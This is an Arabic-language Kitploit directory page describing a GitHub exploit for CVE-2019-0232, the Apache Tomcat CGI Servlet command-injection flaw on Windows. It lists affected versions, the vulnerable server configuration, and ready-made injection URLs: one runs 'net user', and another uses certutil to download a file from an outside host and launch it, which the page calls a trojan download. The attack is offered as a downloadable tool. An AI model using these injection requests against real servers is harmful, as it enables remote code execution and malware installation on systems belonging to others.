Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-0232-EXP — استغلال لثغرة حقن الأوامر في CGI Servlet الخاص بـ Apache Tomcat (CVE-2019-0232) يتيح تنفيذ التعليمات البرمجية عن بُعد عبر طلبات HTTP مُصممة بعناية على الإصدارات المتأثرة. | Kitploit
أدوات/GitHubGitHub/cyy95/cve-2019-0232-exp
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرة
GitHubcyy95/cve-2019-0232-exp

CVE-2019-0232-EXP

استغلال لثغرة حقن الأوامر في CGI Servlet الخاص بـ Apache Tomcat (CVE-2019-0232) يتيح تنفيذ التعليمات البرمجية عن بُعد عبر طلبات HTTP مُصممة بعناية على الإصدارات المتأثرة.

عرض المستودع
331منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-0232-EXP

بيئة الاختبار هي Win10 Home 1809، إصدار jre هو 18.3 (build 10.0.2+13)، إصدار Tomcat هو 9.0.13.

إصدارات Tomcat المتأثرة

★Apache Tomcat 9.0.0.M1 إلى 9.0.17
★Apache Tomcat 8.5.0 إلى 8.5.39
★Apache Tomcat 7.0.0 إلى 7.0.93

تكوين conf/web.xml

root@kitploit:~
<servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi-bin</param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
    <init-param>
      <param-name>executable</param-name>
      <param-value></param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
</servlet>

تكوين تعيينات Servlet:

root@kitploit:~
<servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
</servlet-mapping>

تكوين conf/context.xml

أضف الخاصية privileged="true"

root@kitploit:~
<Context privileged="true">
   <WatchedResource>WEB-INF/web.xml</WatchedResource>
   <WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource>
   <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>
</Context>

أخيرًا، أنشئ ملفًا فارغًا hello.bat داخل مجلد webapps/ROOT/WEB-INF، ولا حاجة لكتابة أي شيء فيه. قم بتشغيل Tomcat، افتح المتصفح، وانتقل إلى الرابط التالي: http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5Cnet+user

اختبار الحقن

سيناريو استغلال الثغرة

أنشئ رابط حقن لتنفيذ وظيفة تنزيل صورة (حصان طروادة): http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3a%2f%2fb.hiphotos.baidu.com%2fimage%2fpic%2fitem%2f9825bc315c6034a8ef5250cec5134954082376c9.jpg+1.jpg+%26start+1.jpg

عارض تنزيل الصور

تنزيل الأداة